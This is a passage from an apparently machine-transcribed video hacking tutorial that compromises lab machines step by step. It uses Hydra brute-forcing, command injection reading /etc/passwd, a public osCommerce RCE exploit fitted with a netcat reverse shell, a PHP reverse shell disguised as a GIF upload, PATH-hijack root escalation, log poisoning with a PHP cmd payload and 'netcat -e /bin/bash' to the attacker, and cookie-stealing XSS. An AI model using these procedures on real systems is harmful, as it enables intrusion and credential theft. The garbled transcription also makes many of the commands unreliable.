system command without proper sanitization or validation. Now, how this command injection will work? Command injection vulnerability occurs when an application takes a user supplied data and incorporates it into a system command in an unsafe way. If the input is not properly validated or sanitized, an attacker can manipulate the input or execute additional commands also. Now, we would like to look at how it will be worked. So, first open the terminal, you just type here as, you just type netdiscord minus I, it's 0. So, let's wait here. So first we would like to identify our network. So here I identify my network. You just type here as nmap minus 34 minus a is an aggressive scale. Let we would like to identify, then we would like to look this. So let's wait for this result. Then let we would like to walk to this directly as 192.168.18.147. So where we would like to bypass this a login. Okay, first we would like to bypass this. So we don't know the username and password. So first of all, we would like to click on inspect the elements. Then let we just open this. So it's available with hosted in the Nginx. That's okay, fine. Let we try first with as a directory buster. HTTP enter your target IP address 192.168.18.147. Let it generate first this word list. I think we not yet any useful informations or XYZ things. So while here I not get any useful information, so I just look only the PHP with extension. So then later we would like to go to this. So here I have got it as some useful information like a command.php. So let we try to here go for here as a command.php. So it's again, it's not even coming over there. Now let me close this. So you just click on the network. Now we just try here as username as admin, password as admin. So you just type here as admin and password is admin. Let you just try here and submit. So where I have get here and post. Now we would like to look here as 404 and 32. So I have got the error. So If it get error, so you just type clear. So you just type here as Hydra minus L. So let you just keep it as a default as a admin, then password. So I would like to utilize as uh, rocky.txt, user share a word list rocky.txt. Then it is in HTTP a post form. Then I would like to enter as let's we would like to go as login.php, then username equal to, so we just enter the username as user, then and password is mentioned in the caps as password. Password, so just give as equal to command. So I would like to use a command that's set here. Let's see here. Uh, so where we not to get anything else here. So I think we have made a mistake here. So we just try here as a login.php. Then we just type here as username equal to user, then add password. We mention as password equal to a password. Then so here I not yet mention as the targeted IP address. So where we would like to go here. So you just need to mention your targeted IP address 192.168.18.147. Now it will crack the password. Let's see here. So it will take a little bit time to crack the password. Now it was attacking on the user and password and the command. Let's see here how long it will take. So where I got the username and password, so just copy this one, come back, now just type username as admin, password is happy. So where I have login here, so username is admin, password is happy, like we would like to log in here. So here I have seen here a system tool, a command.php, like we would like to go here, a command.php. Here we have a list of files. So where a list of files, it was displaying all. Now let me directly open the Burp Suite. We just open the Burp Suite. Once this Burp Suite is open, now we would like to do the command injection from here. So let it open this a Burp Suite. So making a command injection is very quite easy way, but you need to understand how it will go a further and how we would like to execute the command injections. So, what are the types of a command injections? So, there are two types of command injections: direct command injections and blind command injections. So, we are executing a direct command injections now. So, where if you type here as a list of files, then if you run, you are getting as a directly like whatever the list is available, then we are getting. And we would like to look here as disk uses. Once you run here, you get here one is images, CSS, that's it, nothing else. Now, disk free. So this is all a direct command injections. Now, also we would like to discuss about a blind command injections. In this case, an attacker does not see the output of command but still causes the actions on server such as writing to a files, opening a network connections and retrieving the data from the server. Now we already got this, so we just click on interception is up. Now we would like to come back here, switch to an Burp Suite. Now try to run this. So where I have got it, all those things here, list minus air. So you just click on here, click send to a repeater. From the repeater, now what we would like to do here is you just type try to send here. So you would like to look here or like command.php, css, image index.php, login.php, logout.php. Now you can also look here as in the render. So while loading in a first time, it will take a little bit time. Let's look here. So it's taking a too long time. So once you look here, HTTP 200 OK. So where is the list of available things which was displaying here? So uh, now I just need to uh, change here as something. So it's taking a too long time to get display here. So let me just directly go here. So you would like to look from here. So I would like to leave it as this source code as constant and submit. So you just need to delete minus L. Then we just type here as / home. Try to send. So where you got 200, okay. Then you look here, Charles, Jim, Sam. So we are executing through a command and we are getting the result. So this is how it will work for a command injections. So sometimes it will work in the directly in the browser also. Now we would like to look as I would like to go to as a zim now. So we just / you just type zim, then try to send. So we just change a list. So here have a backups and mbox test.sh. So we have seen here. Now we would like to change from zip to a backups. Now we try to send here. Here we got it as old password.backup. Only this one. So I just copy this one, come back here. So you just uh, pasted this one here, old password backup. Now try to send here where you got it. You have selected list from old backup or password. So there is nothing else here uh, to look also. So if you want to test a furthermore anything else, so we would like to come back here. So just close this. Now we would like to look here as in the backups, what is available in the backups. That's it, nothing else in the backups. So now we would like to go to as a zip. Let's try to send. In the send, mbox is available. So we just type here as mbox. So this is how you can enumerate all the information by a command injections. So it is an empty file. So nothing else here to look. So in the render, it's take a long time. So but here we got it here. uh, you have selected home mbox, so we have got it here, but there is nothing else. So we would like to close this. Zim, I would like to go to a home directory again. Try here. Now we would like to look here. We have tried a gym. Now we would like to try here as Charles. Now try to send here as Charles. You have selected home Charles, nothing else here also. Go back to home. So we are viewing directly. Now we would like to look in the send. We just try to send here, nothing else from here. So how do we get a netcat listener of this machine? So better I would like to look here as uh, home. Let me like go as a zip backups. Then let me try here as old passwords dot back. That's it. We try here to look what else we can get it. You have selected home the zim backups whole password dot backup, but we can't able to read from here. Uh, it's a file, a data file. So we would like to utilize here as I would like to in the list place I just type here as cat plus home. Then we would like to try here. You can see here a list of files which have for the backup. So we would like to read like this here. That's it. Now also we would like to look as just close here as etc and password. We would like to read this also. Let's you can see here where a Jim, Sam, Charles. So both 3% have been bashed. Then Jim is the main one, main user. So we have identified here all. So this is how you can do here. So using a password list, you can crack the everything. That's it. So if you want to try that one, you just try. Look here. So you just utilize this one like all. So you just copy. You can't able to copy here. So go to NFRT. So you can copy all the list. Yeah. Go scroll down. Scroll down. So it may available almost all. Almost all 280, almost all 120 keywords. So you just crack the password easily. That's it. So also, if you would like to uh, do as a netcat listener, also that is possible here. So this is how you can do the command injections. That's it. So next, we are going to do as remote code execution. We have already done. Now later we would like to do a file tampering. That's it. Next we would like to continue for file tampering. So guys, now we are going to discussing about remote code execution. Is a type of vulnerability that allows an attacker to execute arbitrary code on remote server system. This type of attack can have uh, serve a consequences as it often provide a complete control over the targeted system, including access to any sensitive data, escalation of privilege, or further attacks on other systems. So we need to know how this remote code execution works. Remote code execution vulnerability typically arises due to an improper handling of user input, especially in case where user input a pass to a function, then execute a system command or a script. If the application does not properly validate and sanitize this input, an attacker can inject and execute a malicious code on system commands. So now we would like to look how this will be done. It's a simple same way we would like to open the terminal first. I just open directly here. Let's open the terminal. Now just type sudo su, enter the password. Then you just type net discord minus it's 0. So first we would like to identify our machine. So here I identify my machine. Now just type here as nmap minus 34 minus s and press scan and enter. So where we got it here, one is available with SMTP, another one is 80, another one is 143. That's okay. Now we would like to come back here. Now just enter your target IP address 192.168.18.138. Then we would like to look here something. Now we would like to scroll down. It's look like it's not like in either by WordPress, either by XYZ things. We prefer not to say anything else. So we would like to just copy this one. We would like to go with the open new tab. We would like to go with the stack repository. Let it paste here. Now we would like to look here as something. So where I have identified here as one is a catalog, we would like to look here as first here the catalog. So where I have identified here as the osmosis osco commerce. Then what is this version is 2.3.41. So we just need to search a remote code execution file. That's it. Then we would like to complete it here. So we would like to copy this osmosis. So that's it. So just copy this, come back here. So you don't need to worry everything about this one. So just type clear. Now just type here as exploit. Then let it paste all here. OS Commerce Online Merchant version 2.3.41. No, we not get it like this. Then we just remove this. Let's try this. No, we not get. Again, we just search here. So where we have identified here a lot of things, osmocodes. Now our version is 2.3.41. So where is 2.3.41? 2341. Okay. This are 2341. This is 2341 remote code execution is 44374.python. So just copy this one. Now just type here as exploit minus yeah 44 374.python where you have got it, so just write clear. Now you have got this a Python source code. Now we just need to read this cat 44374. So where import a request HTTP, we just need to enter. So we just need to delete this Cosmos 2.3.41 and enter our targeted IP address. That's it. And where in the system list we need to enter our netcat listener. So we would like to go back here, come back here as we just go for as a pentest monkey. Let me would like to search this a pentest monkey. Go to this a pentest monkey. Then click on a cheat sheet. Click on a reverse shell. Then scroll down, scroll down. So which type of a netcat we would like to take here? So we would like to utilize the netcat. So I would like to take the second one. So let it take it this one. Let you just open the a notepad for reference. So just put it here. So you just need to know about your IP address. So you just type clear this one. You just type here as config. So this is Podman. You just leave it. This is my virtual host. So my Ethernet is 137. This is my IP address. So let it you just copy this one, come back here. So there you just change this IP address. That's it. Now let's come back here. So just type clear. Now we just need to change a something. We just type here as nano 4. What is this? So we just need to type plus 44374. So you just type here as a nano 44374 dot Python. Enter here. Come back here. So in the base URL in the local host. In the local host, we just need to come back here. Enter the targeted IP address 192.168.18.138. Then let's come back, go back here until you just delete. Yes, this is the catalog. Now also you just need to enter 192.168.18.138. Then we just need to delete this entirely, this ASCII code. So we just need to look very carefully in the system list. We just remove entirely, just copy, come back here, let it paste it here. 10.f. So you just type Control O, Control X. That's it. Now, what you just need to look here as Python. No, now just type look as 44375. Where is system? A remove temp. That's fine. Where you have entered the catalog. That's also great. Where we have done. So you just type here. And we have set up the netcat listener is 1234. Then let's come back here. New tab. You just type here netcat minus lvnp 1234. That's it. Now you just type here as Python 3 44374 dot Python. Now let's look. We just need to visit this targeted website. That's it. Now you can look here. We have successfully got the connection of a remote code execution. This is a remote code execution vulnerability one. So just type ID, you got it here. You just type here who am I, you got it here. Now you just execute a root privilege actions also here. Root privilege escalation. So just type here as Python C import a pdy span bin bash. That's it. This is how you can go and explore everything about a root privilege access. So this is how you can do a remote code execution. That's it. Now later we would like to discuss about arbitrary in file download and upload, arbitrary file exploit. That's it here. So guys, now we are going to discussing about file tampering. So what is this a file tampering? File tampering refers to the unauthorized alteration or modification or manipulation of files. This can involve for changing an contents, metadata or structure of file without permission. File tampering is commonly used in cyber attacks and any type of web applications and any other things like uh, method to detect file tampering methods like file integrity monitoring and checksum hashes and digital signatures, access control like web applications, apps, etc. things, and audit logs and etc. things. Now we would like to look at first. This is our targeted hosting machine where I have one is available with 80. It's in Apache server and another one is in MySQL server. So first we would like to go back here, enter your targeted IP address 192.168.18.150. Let me just enter here. So where we would like to look here, use this server to upload and share images files inside the internet. So we don't know the username and plugin password. So we would like to inspect here. Now we would like to go to as a network tab. We try as like some of the default like admin, admin and admin. Let me try here. Then let's look here. Here we got a parameter with the base equal to login and uh, we got an error. So it's a login failed. Now if it login failed, I think it was in the PHP. So I would like to enter as a PHP filters, PHP filter. Then I would like to use as a convert dot base 64 encode. Then I would like to use as resource equal to a config. Let me try here. So where I have got the config uh, this is in header uh, where we got as what we have request here, no payload for this response. So the response we have got here in the raw data. In the raw data I have got the response. So we don't want to see the raw data. So here we have got the response. So we would like to copy this entirely. Now we just open as CyberChef. Now let's walk to this CyberChef. So let's open this CyberChef. Then we would like to continue further. So it will take some time to load here. So it's scale. So I would like to put from base 64. Then let it paste it here. Now I have got a enter of the some of the usernames and passwords. So just copy this one. Let you just open a notepad. Let it paste it here. Now let me just file a new tab. You just type here as MySQL and host and enter your target IP address, username as root and password. So here I have MySQL, so I would like to go for with the MySQL. Then we would like to enter the password. So this is the password. So just copy the password, paste it. Now we are going to log in into this MySQL. Let's see. It may take a little bit time because to cross check. Yes. Now we have successfully logged in here. Now we just type here as show databases. Oh, sorry. We just type here as show databases. Now we just type here as use users. Then show a tables. Now we just type here as select star from users. So where you have got the all usernames. So usernames with the passwords. So let it come back here. So you just paste it here. So I think the passwords is in base64. So just copy this. You just type exit. Now just type clear. Now you just type here as echo. Let it paste this as base64 as decode. So this is the password for one by one. So let we just paste it here. This also just copy. We just type as echo. Then let it paste it here. Then you just type here as base64 decode. So you can decode all the passwords. Let it paste here. And this also just copy, echo, then let it paste here, and base64 and decode. So this is the password. So just copy, come back here, let it paste. Now what we would like to do from here? Now we try to upload, so we just got the usernames and passwords, everything. Now we try to uh, log in here. First of all, I would like to use as uh, which of what we would like to use here. So we would like to try to use as so I would like to try to use as first one is get. So just copy this one, come back here. So come back here. So just close this. Try to log in from here. So username as get, then password is this one. So just copy, come back here, and let it paste it. Try to log in. So where I have logged in successfully, now I can look here. We have logged in successfully here. We already have a PHP reversal. We just type here list. So I have PHP reversal. I just type here as I have config 143 mousepad rshell.php, where we would like to look here as 143. That's okay. Now try to upload this as PHP reversal. Go to home directory, then upload a reversal.php, then try to upload, not allowed, extension, please upload images only. Okay, now we would like to come back here, So we just copy this, copy r shell dot php to r shell dot php dot jpg. That's it. Now just type list. Okay, r shell dot php dot jpg. Now just type clear. You just type here nano r shell dot php dot jpg. Then let you just add here as gif 98a. Then you just type Control O, Control X. Now I would like to utilize as a Burp Suite. We just type here as Burp Suite. So let me open this, the Burp Suite. Then click on Next and start the Burp Suite. So while putting this a reversal.php, so I just put as a reversal.php dot jpg. So I just need to put directly as a copy as rshell.php to rshell.give. That's great. Now just type here as nano rshell.give. That's better. You just type here as give 98a. That's also a better. So while you are going with this, we just type here as mousepad rshell.give give 98. The port is 1234. That's okay. Now let we try to upload this. So go to the proxy. Now let we would like to click on the browse option. So put this rshell.give. Open this. Now let what we would like to do here is just type here netcat minus lvnp 1234. Then we just need to go to an Firefox, click on Burp Suite, then come back to here, proxy reception is on. Now let me would like to try to upload this. So why did not come? So let me make it forward. So where I got it here as rshell.give. Okay. Now let me. I just uh, send this one into a repeater. In the repeater, uh, we try here. We would like to look here as rshell.give, where your rshell uh, with 192 dot our current Linux IP address and port. We try to send this. Now you can look here 200. Okay. Now you can also look in the render. It will take a little bit time to load here. So let it wait for this data. So where a files which was uploaded successfully come to a proxy, then what you would like to do here is, so just make it as forward, where you have uploaded successfully now here. Now where you would like to look here, so which you have successfully uploaded. Now how we would like to look this uploaded file, so just type here as upload. So I just don't need now Burp Suite. Then we would like to go to this directory as upload. So where you have got it here. So even if you try to click this as GIF one, the image cannot be displayed because it contains an error. Okay, does not matter for us. But we need to manipulate of file tampering. So we have uploaded the file. Now we would like to tamper and get the access. Now we just do here as now let me uh, I just make it off. Now I just make it on again. So now we would like to look as the website. We just come back here. Now we got it here as, so this is the file name. So just entirely copy. Okay, no need. We already have this file name. So where in the cookie you just need to remove entirely this a cookie. So I'm manipulating the cookie ID. Now you just type here as a language equal to, now you can get this in the repeater, where here is, go here, no. So just need to type here as uh, what you have gone here. We would like to go on the street. Copy the link. Now we would like to open here. So we just need to copy entirely of this one. So just copy this, come back here. So put in the proxy. I'm just making a file tampering here. So I just paste it here. Then you have successfully set up the netcat listener. You just type for forward. Now we not get here also anything. Now also we cannot get. So how we would like to do here is, so let me, I try here, so just make it off this one. Then let me, I just go entirely off this one. Let me, I just make it as interception here. So it not come. So let me try here as one more time. Now let me, I would like to change from here as a language equal to, I would like to paste this upload the GIF. Now let me forward this. I have successfully connected here. Now that's it. So where we have successfully get connected, this is how you can do the file tampering. Then now we would like to go for as privilege escalation. So what is a privilege escalation? So privilege escalation occurs when a user or process gain a higher level of privileges or access right. Then they are supposed to have a common steps in cyber attacks, allowing an attacker to move from lower privilege account as a normal user to one of the administrative or a root privilege. There are two primary types, like a vertical privilege escalation and horizontal privilege escalation. So, what is a vertical privilege escalation? Like exploiting a system vulnerabilities to gain a root access on the Linux system. And horizontal privilege escalation. A user accessing another user to private files due to an improper access control. So we are doing an same. One is an vertical, another one is an horizontal also. Then common methods for a privilege escalation, like exploiting the vulnerabilities we have seen before, and weak permissions, misconfigurations, and credential stealings, and SUID and SGID programs in the Linux, DLL hijacking, then abusing scheduled tasks of services also. Now, we would like to do that one. So you just type ID, we got it here. So you just type there as who am I, we got it here. So you just type there which Python, we got it here. So you just type there as Python minus C, import pdy span bin bash. That's it. So once we would like to look here, so just type ID, where is the www data. Now just type as export, no need before. Now just type ls minus a. We are in the main, so just type cd home ls minus a cd connect. So we cannot able to go. So just type su connect. So we already escalated the password. So Kane's username is, so just copy this, then let it paste here. So where I have got it directly here. Now just type ls minus a cd Kane ls minus a. Nothing else is found here. Now you just type as ls minus a. So before I would like to come as not in the Kane. Now I need to go to as some other root users. That one is, we just need to go as su a Kent. The Kent password is this one. So first we would like to go by step by step. So just copy the Kent and paste it. Where we have Kent, you just type plus minus here. Okay. Okay. You just type plus minus here. You just type here as Kent. Oh, sorry, cd Kent ls minus here. Here is nothing else in the Kent. Now just type here as export a term equal to x term. Now just type as clear. Now just type plus minus here. Now we would like to read the bash or C. So where you can observe something as history. So this. So it's a totally a wrong file. Now then Kent over. Now we would like to go to a SU for mic. Once we go for as mic, we have the mic password is this one. So just copy this one, come back here, paste it. So it shows authentication failure. Then I just go to as su Kane. Now we would like to do this. So let we would like to go here. Uh, it was a little bit confusion. Now this we have came here. So we can switch a user from a Ken to a Kenny, but don't have access mic user. So we just type as plus minus here. Okay, no have here. So let's type here plus minus here. CD a Kenny plus minus here. So here I have some interesting things in the Kenny. So I try to run this message mic. Uh, it's not like no such file or directory. That's okay. So we just type here as strings message to a mic. So where we not to get any useful information here. We would like to look the binary of the content to make as a root privilege access. Okay. So you have here a cat home mic message.txt. So let it paste it here. Its permission is denied. So if permission is denied, now what we would like to do here is, so you just type here as clear. Now you just type as echo dollars for path. Then we would like to go to as a temp directory. You just type as cd a temp directory ls minus l. Now here nothing else, so you just type here as echo. You just type here as bin bash, oh sorry, bin bash. Now we would like to type here as a cat where which was done here. So you just type here as chmod plus x as cat. Then you just type here as export path equal to temp equal to a dollar's path. Then you just type here as echo dollar's path. That we was done now here. Now we would like to go to here as go to as cd. Oh, just put it here. So if it never go in the proper way. So let me off this again. We just switch on this. Then try to hear again this Burp Suite. So we have wasted much time here again because of this one. So let me, I just, oh, I have made a mistake again. So let me just refresh this, then let it come back here, make it as interception is up, come back. So where you have here, this is, let you look as history, this one. So entirely just copy this one, let it paste it here. So just entirely copy this, come back. So make it now interception is on. Now let you then refresh this. Here you just entirely delete here. So if you make a single mistake, that will lead a severe collision. Now we just paste it entirely of this one. You just make it as forward. Now you just got it here. You just type here as Python -c import apty pdy span bin bash. That was done. Now we just type here as su as first Kent. So I just copy the username Kent, let it paste the password Kent. Now su we would like to switch to a Tane, so just copy this Kent, paste the password. Now just go to a cd a temp directory ls minus air. So where you have cat. Now we would like to do here is export it equal to extra. That was clear. Now we just come back as cd. That was done. Now what is your task now? You just type ls minus air cd home gain. Now just type ls minus air. Just type here ls minus air. Now we just need to type as message or to a mic. So why it not get no such file or directory? Because the variables which was done that not gonna be execute here. Ls minus air remove minus a cat. Now we would like to type here as from beginning cd, just type here as here. You just type here as echo dollars for path. Then go to cd temp, just type as echo bin bash. Then you just type here as etc password. Just specify as a cat. Now just type here as chmod plus x as cat. Now you just type here as echo dollars path. Now I just type here as cd. Now I just type plus minus air. So I need to go to as cd as. Now just type plus minus air. Now we just need to enter as Mrs. Mike. No such file or directory to as an Mrs. Mike. So how we would like to get this done? So we are getting somewhat difficulties here to bypass this. So I have not yet mentioned as properly. I'm guessing in my way. So I have given the path directly, but I not yet given the path directly. So let me go back here. So cd temp directory plus minus here. Now we have. So otherwise we just type clear. So just type remove as cat. No such file directory. So just type plus minus here. cd in temp directory plus minus here. Remove as cat. Now just type cd, just type list plus minus here. Now we just type here as export dollars for path. That was done. So which was already as identified for user game, so I don't need to mention again. cd temp directory. Then just type here as echo a bin bash. Now we would like to type here as export the path equal to in the temp directory of $path. That's it. Here export path equal to temp. Okay, that's great. Now we just type as cd. Now just type this minus here. Now we just type as Mrs. Mike. Cannot came to uh, strings Mrs. Mike. So where it have, let me like to here cat. Hope Mrs. Mike dot Mrs. So just type cat. Its permission is denied. So just type here. So we have failed to give a permissions here. So just type here as remove export. Oh sorry. We just type here as echo dollars path that now was clear in the main. Now just put a cd temp ls minus here. Remove this cat. I just type here as echo. Now we just type here as bin dash. We have done the cat part. So give the permission for a cat. Now we just type here as export for path equal to in the temp directory is a temp dollars for path. That's it. Then we just type here as echo dollars for path, where we have done now. We just type cd. Now we just type again as list. Now we just run this in Mrs. Mike. Now we have successfully bypassed this Mrs. Mike. Now just type list minus f. Now just type cd home list minus f, cd a Mike list minus f. So message to root. Now how we would like to go to any root. So just of this. So maybe somewhat it will be required. So now message to root. Now how we would like to go to this in the root access directly now. Now let me try here as message to root asking hello. Yes, it was printing the hello. That's great. Now let me I try here with the strings message to arrow. So this mission of root previous access, it will be somewhat difficulties to face here. Message body, how it will become. So okay, that's great. So let's start here. Now we would like to enter here. So for message to root, so you just type this minus here. Now we just type here as message to root. Now I just need to enter a simple command here is hello. Then you would like to paste here as a bin bash. That's it. So where I have got it in the bash script here. Now how I would like to enter here is now just type id We are in the mic, but not in the root also. So here I have got this bash one. Then how we would like to bypass this? So just type as bash minus f. Okay, again it was returning. Now let me, I just try here again as message to root, then message for a root as hello, then we just type as bin sh. That's it. I think we not need to enter anything else. I have got it here. Now, to read this, a flag. Now just type here as uh, ID. We are in the root now. You can see here we are in the root. Before we are not in the root. You can look here. Before we are not in the root. Now we have got the root. So now just type here as who am I? I got the root. So just type cd a root ls minus here. Now to read this flag, so just type here as cat a flag.txt. So, but we not yet get any useful information here. Why? Because we have made some mistake. Bash minus I. So we would like to go back here. Where is this? Message to root. So just copy, paste it. Okay, so let's type here as ls minus here. So its permission is denied. C home ls minus here. cd mic ls minus here. Now message to root. Hello bin sh. Now just type id here in the root. So to read these files, we would like to try here as now we would like to go to as cd a root plus minus here. Now we just type as bin cat then flag.txt. Oh, sorry. So we would like to try here again bin cat flag.txt. That's it. So this is how you can read and get the root privilege access. So different machines, different privilege escalations. That's it. So this is how you can do the privilege escalation. So later we would like to discuss about log poisoning. That's it. So guys, now we are going to do as a log poisoning. Log poisoning is a technique used attackers to manipulate or inject a malicious content into a log files by tampering with the log entries. Attackers can hide their activities and mislead the system administrator or even execute a code on system that process a log improperly. Is often used in combination with other attacks such as privilege escalation or web application exploitation to evade a detection and maintain the persistence. Now, I have posted my mission is here, then I have got the nmap reserved here. So I have only targeted this one is with 8. Now we would like to go to the targeted IP address 192.168.18.151. Now I have seen here everything here. Now we would like to Go to as we would like to look all. So go to home. It's in index.php. Uh, this is about. This is in fact and contact. So in the contact.php, so let me, I just enter my name as enter, just enter as, so I'm new here. So let it, I enter, so let, I just try to submit. So where I have got it here, everything, like we would like to look the first as pesos. In the pesos, uh, that's it. The copyright is 2019. That's it. We not yet get any useful information. So here we have seen here copyright 2019, and thank you for taking the time to contact us. Then once you would like to look here, this is 2020. So where I have got the parameter thank you.php. Now I just need to entirely I just delete from here. I just type here as file uh, equal to, I just enter as etc as password. That's it. Where I have got the access here, like a local file inclusion one of the page. So where we have got all these things here. Now to look the uh, uh, where as an Apache log. So we would like to look here and we would like to integrate here. Now we just type here as where log uh, Nginx. So this was hosted in the Nginx. So how you would like to identify this one? So for this, we just type here as what web HTTP enter your targeted IP address 192.168.1.151. Let you can look here. So it may take a little bit time to present here. So you can look here. It was hosted in the Nginx 1.6.2. We would like to go for Nginx. Then you just type here as access.log. That's it. So where you have got the access.log, we would like to look the page source. So here access.log, we have all here. Now we would like to look here. Now I have tried here one web. That was also the record will be done over there. Now we would like to do the exploitation of the local file inclusion. First, open the Burp Suite. So let it open first. So let me start this Burp Suite. So now we have opened this. So we just come to an proxy tab. Now make it as interception is up. Now we would like to come back here in this contact access.log. So we just make a Burp Suite is up. Now let me try to send this. Where I have got it here, where a log nginx access dot log. So you just send this one into a repeater. In the repeater, you just need to you just try to send this one. Then we would like to look here. A lot of things will it will be displayed here. Now I would like to change the here as something as a parameter. Now let me I just enter as a PHP. Then you just type as system underscore a get cmd. Then let it close this. Then we have done here. So I try to send here. Try to send here. Thank you for taking time to contact us. So sorry, I just need to enter this command entirely. So just copy this in the proxy tab where you have got this one. So let it paste here PHP where we are entering as command. Let users make it as forward. Then thank you for taking time to us to contact. Now we would like to look the page source. Now we have uh, got this all everything. Now what we would like to do here is so just make it description is off. In the Burp Suite is also off. Now we would like to look as nginx. We would like to go for as not for access log, we need to go for error log. Then cmd equal to id. We just try here where you get here you would like to look here uid www.data a groups and data. Now let me show you here in the Burp Suite in the repeater tab. So let it you just delete this. So entirely you delete this. So you just need to get entirely from here. So just copy this parameter, let it paste it here in the file. Now you just try to send. You would like to look here as www.data where we have identified here. Now we are doing as log poisoning. So we are exploiting through a local file inclusion as a log poisoning. So before that, we know how to get an access of this machine or this website. Now we try here, come back here. Next, we just try here as we just try cmd equal to which netcat. Then try to send here Unix where host is 151. So where you have got it here. That's okay. Now we would like to try here like let me set up the netcat listener. So you just type here as ifconfig is 143 netcat lvnp 1234. So we just try here netcat -e bin bash enter your target IP address 192.168.18.143 then 1234. That's it. Try to send here. Now we have successfully get the connected of the target location. Just type ID, we got it. We just type here switch Python, we got it. So just type here Python -c import pdy span bin bash. So this is how you can do the local file. Uh, oh, sorry. This log files. So for a log poisoning, how a log poisons work. We have seen here attackers injector is specially a crafted input like HTML tag, otherwise a script tags, coded into a log via vulnerable input fields in the web application. So I have inputted in the web applications. Then I have connected and get the reversal access back. That's it. Then, exploiting a poor log sanitization. Logs may not properly sanitize. Input allows an attacker to inject a harmful commands or a script that could execute a log view or monitoring of the systems also. That's it. Then, attackers may inject a misleading or a fake log entries. I have make an error log includes and get the reversal access. That's it here. So we have done the log poisoning. Next, we can do a later as weak SL cipher. So guys, now we are going to discussing about weak SL cipher. So what is weak SL cipher? Weak SL or TLS ciphers are cryptographic algorithms that are considered insecure due to vulnerabilities, insufficient key lengths, or a flaw that can be exploited by attackers. These ciphers can compromise the security of SL or TLS connections, potentially exposing a sensitive data like passwords or credit card numbers or private communications to intercept or tampering also. So, like we can see like common type of SL cipher like Revis cipher core, then data encryption standard, you can call it as DES, and triple DES. So, what is this triple DES? While triple DES improves on the DES by applying the algorithm three times with a different keys, it is still vulnerable to attacks like a Sweet 32 attack, which can exploit a 64-bit block size, making it insecure for long-running sessions and export ciphers also. Then we would like to look as null ciphers, CBC mode vulnerabilities, cipher block changing, and MD5, SHA-1, SHA-255 hash functions also we can see. When you look any type of targeted website with the green of the SL, that is most secure, but we won't get any type of green one. Let me show you that one for your clarity here. So here must and should be required here in the green symbol. If it that providing the green symbol, they are using a white wildcard for SL protection is very good. Now we would like to look for as port 443. So where I have got here all SL certificates where which have. Now let we try all this one of the targeted websites. So first we would like to open here. So first we would like to type here as we would like to go with the sudo su, enter our password, just type as nmap minus t4, minus t4 minus a is an address get, and we need to get only the targeted IP address. That's only our task. So just copy, then let it paste it. Then we would like to enter. So let's wait for this nmap result. Then we would like to open new tab. Just type here as sl as scan minus help. So where you can identify here SL scan host or port, otherwise host, we just need to enter. So if you have a list of a target, so you just need to enter the targeted files, file path of the location also. You can look here SL2, check only for SL version 2 is enabled, version 3 is enabled, then TLS cipher. So we would like to do here as, so just type here as SSL. Let me paste this targeted IP address. Now it will check all the ciphers for you. Look here, TLS registration, session, all everything will be displayed here. So let it go here further. So it was using as an AES algorithm. So it is very easy to decrypt the AES algorithm. So you would like to look here all. So I told you three DES they are using triple triple data encryption standard. They are using as a triple data encryption standard. That is for with the 256 bits encryption. So server key exchange group. So you can also look here. This is the key where we have got it here. So not valid before as October 10th, 23. Not valid after also. So where we have identified all here. So signature algorithm, where we have got the signature algorithm. ECDSA with the SHA-256. So just copy this. So you can also observe here uh, this one. We would like to look here. How to sign and verify ECDSA or SHA-256. So the attackers can search very carefully and look. So where we got like begin and end of the certificate, the certification value. So you can look here. So here, this is how you can get the certificate. That's it. And you can also verify from here, go back here. Connection is secure. Uh, verified by let's encrypt. So you just click on more. Then we would like to look here. This is in Stack Overflow. Look as media permissions security. So we would like to look the certificate. Look here, but here is certificate is not as presented. If we get a certification is presented, we can try to bypass that one also. ISRG root x1. So this is a PM, a certification. So it's very easy to you got here as certificate. So where it was hidden inside here. So we would like to open link in new tab. So we don't want to download this. That's it here. So it's not publishing this certificate. It's only a download option. That's it. Nothing else. We gonna get it here. So where we got it here. Let me try here. Stack Overflow.pem. So just open this. Download. So just open terminal here. Now just type list. You just type get stack overflow.pem. Paste it here. So this is how you can get the certificate. It's same like SS certificate, but it's totally different. That's it. So this is how you can connect. So as of YouTube community guidelines, I'm not showing you here a further. That's it. Now we would like to close here. We have done this one. Now we would like to look here where 443 is available. So now I just try here as we would like to try here as something. We just try here as we have this target IP address. You just type here as nmap minus t4 minus A is an aggressive scan, and I would like to search in the port of 443. Port is 443. Then I would like to use as a script a cell for enumeration of the ciphers and enter your targeted IP address. So what is your targeted IP address is? This is your targeted IP address. So just copy and let it paste here. Let we try here what else information we can get. So what else we have scanned in the SL scan, the same exact output only we can get it. We won't get as an extra anything else. I hope so. That's it. Let me close this. So let we would like to look. So it will take a little bit time to come. So we would like to try until that will come. We would like to try as one more. This software development cloud services in the New York Student Management System. Now we would like to try this healthcare analytics platform. So let me copy this one. We would like to try here. So just type here SL scan. Let it paste here. So we just 103. Last one we have tried as so where we have got it here is ciphers with the TLS ciphers, compressors, there is no compressors, cipher preference is a server, warning 64-bit block cipher, 3 data encryption secure is it's vulnerable to the Suite 32 attack. So where I have told you before, it is vulnerable for a Suite 32 attack. This is vulnerable. So this is how you can identify all here. That's it. Now we would like to try is Suite 32 data encryption standard. It's vulnerable. That's it. So if it's vulnerable, you can try to go for attack directly. Now we would like to try here. This is also a same way. Now if you want to try the same thing, we would like to put here as, let me just try here, then let's try here. Let's see what else we can get it here one more time in this. So we have got it here. So here it's not vulnerable for SL enum cipher. It is with the TLS version 1 and it is not vulnerable. That's it. It's a little bit secure. That's it. So this is how you can do the weak SL cipher. Now next we would like to do for a cookie modification. So guys, now we are going to discussing about cookie modification. So what is a cookie modification? Cookie modification refers to the act of altering the content of browser cookies to manipulate the behavior of web application or bypass the security mechanism. Since cookies are often used to store a session data, user preference or authentication tokens, modifying a cookies can allow attacker to escalate the privilege, impersonate a user or hijack the session. So we already have this a testing website. We would like to enter as something as here as script. Then you just type here as alert or document dot cookie. Then let me would like to close the script tag. Then try to search here. We would like to click on the inspect the elements. So where once we have somewhat a valid cookies is presented, that will be displayed here directly. So we not yet get displayed here any type of cookie here. Now we just type here as document dot cookie. Here nothing else. So once you look in the storage, here there is no data present in the selected host. Now we can also go for a login. So it was storing in front of here. So you just type here as test and test. Try to log in here. So now we can look in the cookie, and here a cookie value is available here as test 2.f. The login test.2f, the created date, etc. thing. So we have here secure false, same side none, then age is the session, everything we have got it here. So cookie modifications will be done like in the session hijacking, privilege escalation, and cross-site scripting, cross-site request forgery, and persistent cookie manipulation also. So using as a cookie value in the SQL injection, we can do the SQL injection also. That we would like to look here in the SQL map minus help. Let me show you here what we would like to put here. So where is this a dump data version wizard? So you can look here a cookie, and we need to 